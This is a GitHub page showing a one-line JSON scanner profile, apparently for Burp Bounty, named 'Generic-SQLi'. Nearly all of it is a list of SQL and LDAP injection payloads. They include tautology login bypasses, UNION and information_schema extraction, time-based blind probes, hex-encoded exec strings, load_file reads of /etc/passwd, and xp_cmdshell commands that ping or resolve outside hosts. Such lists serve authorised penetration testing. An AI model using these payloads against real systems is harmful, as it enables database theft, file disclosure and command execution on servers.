-
-
Notifications
You must be signed in to change notification settings - Fork 43
/
Copy pathGeneric-SQLi.bb
1 lines (1 loc) · 8.06 KB
/
Generic-SQLi.bb
1
[{"Name":"Generic-SQLi","Enabled":true,"Scanner":1,"Payloads":[")%20or%20(\u0027x\u0027\u003d\u0027x","%20or%201\u003d1","; execute immediate \u0027sel\u0027 || \u0027ect us\u0027 || \u0027er\u0027","benchmark(10000000,MD5(1))#","update","\";waitfor delay \u00270:0:__TIME__\u0027--","1) or pg_sleep(__TIME__)--","||(elt(-3+5,bin(15),ord(10),hex(char(45))))","\"hi\"\") or (\"\"a\"\"\u003d\"\"a\"","delete","like","\" or sleep(__TIME__)#","pg_sleep(__TIME__)--","*(|(objectclass\u003d*))","declare @q nvarchar (200) 0x730065006c00650063 ...","or 0\u003d0 #","insert","1) or sleep(__TIME__)#",") or (\u0027a\u0027\u003d\u0027a","; exec xp_regread","*|","@var select @var as var into temp end --","1)) or benchmark(10000000,MD5(1))#","asc","(||6)","\"a\"\" or 3\u003d3--\"","\" or benchmark(10000000,MD5(1))#","# from wapiti","or 0\u003d0 --","1 waitfor delay \u00270:0:10\u0027--","or \u0027a\u0027\u003d\u0027a","hi or 1\u003d1 --\"","or a \u003d a","UNION ALL SELECT",") or sleep(__TIME__)\u003d\u0027",")) or benchmark(10000000,MD5(1))#","hi\u0027 or \u0027a\u0027\u003d\u0027a","0","21 %","limit","or 1\u003d1","or 2 \u003e 1","\")) or benchmark(10000000,MD5(1))#","PRINT","hi\u0027) or (\u0027a\u0027\u003d\u0027a","or 3\u003d3","));waitfor delay \u00270:0:__TIME__\u0027--","a\u0027 waitfor delay \u00270:0:10\u0027--","1;(load_file(char(47,101,116,99,47,112,97,115, ...","or%201\u003d1","1 or sleep(__TIME__)#","or 1\u003d1","and 1 in (select var from temp)--","or \u00277659\u0027\u003d\u00277659","or \u0027text\u0027 \u003d n\u0027text\u0027","--","or 1\u003d1 or \u0027\u0027\u003d\u0027","declare @s varchar (200) select @s \u003d 0x73656c6 ...","exec xp","; exec master..xp_cmdshell \u0027ping 172.10.1.255\u0027--","3.10E+17","\" or pg_sleep(__TIME__)--","x\u0027 AND email IS NULL; --","\u0026","admin\u0027 or \u0027","or \u0027unusual\u0027 \u003d \u0027unusual\u0027","//","truncate","1) or benchmark(10000000,MD5(1))#","\\x27UNION SELECT","declare @s varchar(200) select @s \u003d 0x77616974 ...","tz_offset","sqlvuln","\"));waitfor delay \u00270:0:__TIME__\u0027--","||6","or%201\u003d1 --","%2A%28%7C%28objectclass%3D%2A%29%29","or a\u003da",") union select * from information_schema.tables;","PRINT @@variable","or isNULL(1/0) /*","26 %","\" or \"a\"\u003d\"a","(sqlvuln)","x\u0027 AND members.email IS NULL; --","or 1\u003d1--","and 1\u003d( if((load_file(char(110,46,101,120,11 ...","0x770061006900740066006F0072002000640065006C00 ...","%20\u0027sleep%2050\u0027","as","1)) or pg_sleep(__TIME__)--","/**/or/**/1/**/\u003d/**/1","union all select @@version--",",@variable","(sqlattempt2)","or (EXISTS)","t\u0027exec master..xp_cmdshell \u0027nslookup www.googl ...","%20$(sleep%2050)","1 or benchmark(10000000,MD5(1))#","%20or%20\u0027\u0027\u003d\u0027","||UTL_HTTP.REQUEST","or pg_sleep(__TIME__)--","hi\u0027 or \u0027x\u0027\u003d\u0027x\u0027;","\") or sleep(__TIME__)\u003d\"","or \u0027whatever\u0027 in (\u0027whatever\u0027)","; begin declare @var varchar(8000) set @var\u003d\u0027 ...","union select 1,load_file(\u0027/etc/passwd\u0027),1,1,1;","0x77616974666F722064656C61792027303A303A313027 ...","exec(@s)",") or pg_sleep(__TIME__)--","union select","or sleep(__TIME__)#","select * from information_schema.tables--","a\u0027 or 1\u003d1--","a\u0027 or \u0027a\u0027 \u003d \u0027a","declare @s varchar(22) select @s \u003d","or 2 between 1 and 3","or a\u003da--","or \u00271\u0027\u003d\u00271","|","or sleep(__TIME__)\u003d\u0027","or 1 --\u0027","or 0\u003d0 #\"","having","a\u0027","\" or isNULL(1/0) /*","declare @s varchar (8000) select @s \u003d 0x73656c ...","â or 1\u003d1 --","char%4039%41%2b%40SELECT","order by","bfilename","having 1\u003d1--",") or benchmark(10000000,MD5(1))#","or username like char(37);",";waitfor delay \u00270:0:__TIME__\u0027--","\" or 1\u003d1--","x\u0027 AND userid IS NULL; --","*/*","or \u0027text\u0027 \u003e \u0027t\u0027","(select top 1","or benchmark(10000000,MD5(1))#","\");waitfor delay \u00270:0:__TIME__\u0027--","a\u0027 or 3\u003d3--","-- \u0026password\u003d","group by userid having 1\u003d1--","or \u0027\u0027\u003d\u0027","; exec master..xp_cmdshell","%20or%20x\u003dx","select","\")) or sleep(__TIME__)\u003d\"","0x730065006c0065006300740020004000400076006500 ...","hi\u0027 or 1\u003d1 --","\") or pg_sleep(__TIME__)--","%20or%20\u0027x\u0027\u003d\u0027x","or \u0027something\u0027 \u003d \u0027some\u0027+\u0027thing\u0027","exec sp","29 %","(","ý or 1\u003d1 --","1 or pg_sleep(__TIME__)--","0 or 1\u003d1",") or (a\u003da","uni/**/on sel/**/ect","replace","%27%20or%201\u003d1",")) or pg_sleep(__TIME__)--","%7C","x\u0027 AND 1\u003d(SELECT COUNT(*) FROM tabname); --","\u0026apos;%20OR","; or \u00271\u0027\u003d\u00271\u0027","declare @q nvarchar (200) select @q \u003d 0x770061 ...","1 or 1\u003d1","; exec (\u0027sel\u0027 + \u0027ect us\u0027 + \u0027er\u0027)","23 OR 1\u003d1","/","anything\u0027 OR \u0027x\u0027\u003d\u0027x","declare @q nvarchar (4000) select @q \u003d","or 0\u003d0 --","desc","||\u00276",")","1)) or sleep(__TIME__)#","or 0\u003d0 #","select name from syscolumns where id \u003d (sele ...","hi or a\u003da","*(|(mail\u003d*))","password:*/\u003d1--","distinct",");waitfor delay \u00270:0:__TIME__\u0027--","to_timestamp_tz","\") or benchmark(10000000,MD5(1))#","UNION SELECT","%2A%28%7C%28mail%3D%2A%29%29","+sqlvuln","or 1\u003d1 /*",")) or sleep(__TIME__)\u003d\u0027","or 1\u003d1 or \"\"\u003d","or 1 in (select @@version)--","sqlvuln;","union select * from users where login \u003d char ...","x\u0027 or 1\u003d1 or \u0027x\u0027\u003d\u0027y","28 %","â or 3\u003d3 --","@variable","or \u00271\u0027\u003d\u00271\u0027--","\"a\"\" or 1\u003d1--\"","//*","%2A%7C","\" or 0\u003d0 --","\")) or pg_sleep(__TIME__)--","?","or 1/*","!","\u0027","or a \u003d a","declare @q nvarchar (200) select @q \u003d 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)","declare @s varchar(200) select @s \u003d 0x77616974666F722064656C61792027303A303A31302700 exec(@s)","declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)","declare @s varchar (200) select @s \u003d 0x73656c65637420404076657273696f6e exec(@s)","\u0027 or 1\u003d1","\u0018 or 1\u003d1 --","x\u0027 OR full_name LIKE \u0027%Bob%","\u0027; exec master..xp_cmdshell \u0027ping 172.10.1.255\u0027--","\u0027%20or%20\u0027\u0027\u003d\u0027","\u0027%20or%20\u0027x\u0027\u003d\u0027x","\u0027)%20or%20(\u0027x\u0027\u003d\u0027x","\u0027 or 0\u003d0 --","\u0027 or 0\u003d0 #","or 0\u003d0 #\"","\u0027 or 1\u003d1--","\u0027 or \u00271\u0027\u003d\u00271\u0027--","\u0027 or 1 --\u0027","or 1\u003d1--","\u0027 or 1\u003d1 or \u0027\u0027\u003d\u0027","or 1\u003d1 or \"\"\u003d","\u0027 or a\u003da--","or a\u003da","\u0027) or (\u0027a\u0027\u003d\u0027a","\u0027hi\u0027 or \u0027x\u0027\u003d\u0027x\u0027;","or","procedure","handler","\u0027 or username like \u0027%","\u0027 or uname like \u0027%","\u0027 or userid like \u0027%","\u0027 or uid like \u0027%","\u0027 or user like \u0027%","\u0027; exec master..xp_cmdshell","\u0027; exec xp_regread","t\u0027exec master..xp_cmdshell \u0027nslookup www.google.com\u0027--","--sp_password","\u0027 UNION SELECT","\u0027 UNION ALL SELECT","\u0027 or (EXISTS)","\u0027 (select top 1","\u0027||UTL_HTTP.REQUEST","1;SELECT%20*","\u003c\u003e\"\u0027%;)(\u0026+","\u0027%20or%201\u003d1","\u0027sqlattempt1","%28","%29","%26","%21","\u0027 or \u0027\u0027\u003d\u0027","\u0027 or 3\u003d3","\u0018 or 3\u003d3 --"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["error"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"0","isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"IssueName":"Generic-SQLi","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Generic-SQLi\n\n\u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Scantype":0,"pathDiscovery":false}]